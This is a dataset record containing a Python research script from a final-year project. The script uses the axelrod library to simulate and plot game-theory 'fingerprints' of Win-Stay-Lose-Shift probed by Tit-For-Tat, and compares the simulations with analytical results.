] | nabil.belahrach@gmail.com |
fe3fb3bdcd9617b9dc840ffe4433e177cc9b8180 | 208c6c02b66d9b99f599e2bd9bd254aba1a06158 | /fingerprint.py | bc2b4d27ca1db214b61768782e48209e0f429a8e | [] | no_license | theref/FinalYearProject-Code | 85b7c82d186d583c94b61a031aacc1bc2916a8b3 | e18c6e5af4dc76e6f6429521218d2681304f6272 | refs/heads/master | 2023-09-01T09:41:39.328534 | 2016-11-04T10:04:22 | 2016-11-04T10:04:22 | 69,358,389 | 0 | 0 | null | 2023-08-22T10:07:36 | 2016-09-27T13:16:50 | Python | UTF-8 | Python | false | false | 9,521 | py | from functools import partial
import matplotlib.pyplot as plt
import seaborn as sns
from multiprocessing import Pool
from itertools import product
import numpy as np
from collections import defaultdict
import axelrod as axl
from axelrod.strategy_transformers import MixedTransformer, dual
from axelrod.interaction_utils import compute_final_score_per_turn as cfspt
from axelrod.interaction_utils import compute_normalised_state_distribution as cnsd
states = [('C', 'C'), ('C', 'D'), ('D', 'C'), ('D', 'D')]
def expected_value(fingerprint_strat, probe_strat, turns, repetitions=50,
warmup=0, start_seed=0, coords=None):
"""
Calculate the expected score for a strategy and probe strategy for (x, y)
"""
strategies = [axl.Cooperator, axl.Defector]
probe_strategy = MixedTransformer(coords, strategies)(probe_strat)
players = (fingerprint_strat, probe_strategy())
scores = []
distribution = defaultdict(int) # If you access the defaultdict using a key, and the key is
# not already in the defaultdict, the key is automatically added
# with a default value. (stackoverflow)
for seed in range(start_seed, start_seed + repetitions): # Repeat to deal with expectation
axl.seed(seed)
match = axl.Match(players, turns) # Need to create a new match because of caching
match.play()
interactions = match.result[warmup:]
scores.append(cfspt(interactions)[0]) # compute_final_score_per_turn
match_distribution = cnsd(interactions) # compute_normalised_state_distribution
for st in states:
distribution[st] += match_distribution[st]
factor = 1.0 / sum(distribution.values())
for k in distribution: # normalize the new dictionary
distribution[k] = distribution[k] * factor
mean_score = np.mean(scores)
return coords, mean_score, distribution
def get_coordinates(granularity):
coordinates = list(product(np.arange(0, 1, granularity), np.arange(0, 1, granularity)))
original_coords = [x for x in coordinates if sum(x) <= 1]
dual_coords = [x for x in coordinates if sum(x) > 1]
return dual_coords, original_coords
def get_results(fingerprint_strat, probe_strat, granularity, cores,
turns=50, repetitions=10, warmup=0, start_seed=0):
dual_coords, original_coords = get_coordinates(granularity)
p = Pool(cores)
func = partial(expected_value, fingerprint_strat(), probe_strat, turns, repetitions, warmup,
start_seed)
sim_results = p.map(func, original_coords)
p.close()
p.join()
q = Pool(cores)
dual_strat = dual(fingerprint_strat())
dual_func = partial(expected_value, dual_strat, probe_strat, turns, repetitions, warmup,
start_seed)
dual_results = q.map(dual_func, dual_coords)
q.close()
q.join()
results = sim_results + dual_results
results.sort()
return results
def AnalyticalWinStayLoseShift(coords):
"""
The analytical function for Win-Stay-Lose-Shift (Pavlov) being probed by
Tit-For-Tat
"""
x = coords[0]
y = coords[1]
numerator = 3 * x * (x - 1) + y * (x - 1) + 5 * y * (y - 1)
denominator = (2 * y * (x - 1) + x * (x - 1) + y * (y - 1))
value = numerator / denominator
return coords, value
def fingerprint(fingerprint_strat, probe_strat, granularity, cores,
turns=50, name=None, repetitions=50, warmup=0, start_seed=0):
"""
Produces a fingerprint plot for a strategy and probe strategy
"""
if name is None:
name = fingerprint_strat.name + ".pdf"
scores = get_results(fingerprint_strat, probe_strat, granularity, cores, turns, repetitions,
warmup, start_seed)
xs = set([i[0][0] for i in scores])
ys = set([i[0][1] for i in scores])
values = np.array([i[1] for i in scores])
clean_data = np.array(values).reshape(len(xs), len(ys))
sns.heatmap(clean_data, xticklabels=False, yticklabels=False)
plt.savefig(name)
def analytical_distribution_wsls(coords):
x = coords[0]
y = coords[1]
distribution = {('C', 'C'): x * (1 - x),
('D', 'C'): y * (1 - y),
('D', 'D'): y * (1 - x),
('C', 'D'): y * (1 - x)
}
factor = 1.0 / (2 * y * (1 - x) + x * (1 - x) + y * (1 - y))
for k in distribution:
distribution[k] = distribution[k] * factor
return coords, distribution
def state_distribution_comparison(fingerprint_strat, probe_strat, granularity, cores,
turns=50, repetitions=50, warmup=0, start_seed=0):
results = get_results(fingerprint_strat, probe_strat, granularity, cores, turns, repetitions,
warmup, start_seed)
dual_coords, original_coords = get_coordinates(granularity)
coordinates = dual_coords + original_coords
q = Pool(cores)
analytical_dist = q.map(analytical_distribution_wsls, coordinates)
analytical_dist.sort()
final_results = []
for i, an in enumerate(analytical_dist):
coordinates = results[i][0]
sim_dist = results[i][2]
ana_dist = an[1]
new_dict = defaultdict(tuple)
for state, value in sim_dist.items():
new_dict[state] = (float("%.2f" % value), float("%.2f" % ana_dist[state]))
final_results.append((coordinates, dict(new_dict)))
xs = sorted(list(set([i[0][0] for i in final_results])))
table = "& "
table += " & ".join(str(e) for e in xs) + " \\\ \n"
for coord1 in xs:
table += "\hline \n"
table += "{0:.1f}".format(coord1)
for st in states:
for coord2 in xs:
table += " & "
table += "({0})".format(", ".join(str(i) for i in st))
table += ": "
sim_val = [dict(element[2])[st] for element in results if element[0] == (coord1, coord2)]
ana_val = [element[1][st] for element in analytical_dist if element[0] == (coord1, coord2)]
table += "({0:.2f}, {1:.2f})".format(sim_val[0], ana_val[0])
table += " \\\ \n"
info = """%% fingerprint strat - {}
%% probe strat - {}
%% granularity - {}
%% cores - {}
%% turns - {}
%% repetitions - {}
%% warmup - {}
%% start seed - {}""".format(fingerprint_strat, probe_strat, granularity, cores,
turns, repetitions, warmup, start_seed)
with open("comparison.txt", 'w') as outfile:
outfile.write(table)
def analytical_fingerprint(granularity, cores, name=None):
dual_coords, original_coords = get_coordinates(granularity)
coordinates = dual_coords + original_coords
p = Pool(cores)
scores = p.map(AnalyticalWinStayLoseShift, coordinates)
scores.sort()
xs = set([i[0][0] for i in scores])
ys = set([i[0][1] for i in scores])
values = np.array([i[1] for i in scores])
clean_data = np.array(values).reshape(len(xs), len(ys))
sns.heatmap(clean_data, xticklabels=False, yticklabels=False)
plt.savefig(name)
def plot_sum_squares(fingerprint_strat, probe_strat, granularity, cores,
turns=50, name=None, repetitions=50, start_seed=0):
if name is None:
plot_name = "sum_squares.pdf"
else:
plot_name = name
dual_coords, original_coords = get_coordinates(granularity)
coordinates = dual_coords + original_coords
warmup=0
cc_errors = []
cd_errors = []
dc_errors = []
dd_errors = []
q = Pool(cores)
analytical_dist = q.map(analytical_distribution_wsls, coordinates)
analytical_dist.sort()
for t in range(1, turns):
results = get_results(fingerprint_strat, probe_strat, granularity, cores, t, repetitions,
warmup, start_seed)
cc_e = []
cd_e = []
dc_e = []
dd_e = []
for index, value in enumerate(results):
sim_dist = value[2]
ana_dist = analytical_dist[index][1]
errors = [(val - ana_dist[key])**2 for key, val in sim_dist.items()]
cc_e.append(errors[0])
cd_e.append(errors[1])
dc_e.append(errors[2])
dd_e.append(errors[3])
cc_errors.append(np.mean([x for x in cc_e if x > 0]))
cd_errors.append(np.mean([x for x in cd_e if x > 0]))
dc_errors.append(np.mean([x for x in dc_e if x > 0]))
dd_errors.append(np.mean([x for x in dd_e if x > 0]))
plt.plot(cc_errors, label='CC errors')
plt.plot(cd_errors, label='CD errors')
plt.plot(dc_errors, label='DC errors')
plt.plot(dd_errors, label='DD errors')
plt.ylim(0, 0.01)
plt.xlabel('Turns')
plt.ylabel('Mean Errors Squared')
plt.legend()
plt.savefig(plot_name)
# fingerprint(axl.WinStayLoseShift, axl.TitForTat,
# granularity=0.01, cores=4, turns=50, repetitions=5, warmup=0)
# analytical_fingerprint(0.01, 4, "AnalyticalWinStayLoseShift.pdf")
# state_distribution_comparison(axl.WinStayLoseShift, axl.TitForTat, granularity=0.2, cores=4,
# turns=200, repetitions=20, warmup=100)
plot_sum_squares(axl.WinStayLoseShift, axl.TitForTat, granularity=0.05, cores=4,
turns=100, repetitions=5, name="large_errors_plot.pdf")
| [
"james.campbell@tanti.org.uk"
] | james.campbell@tanti.org.uk |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.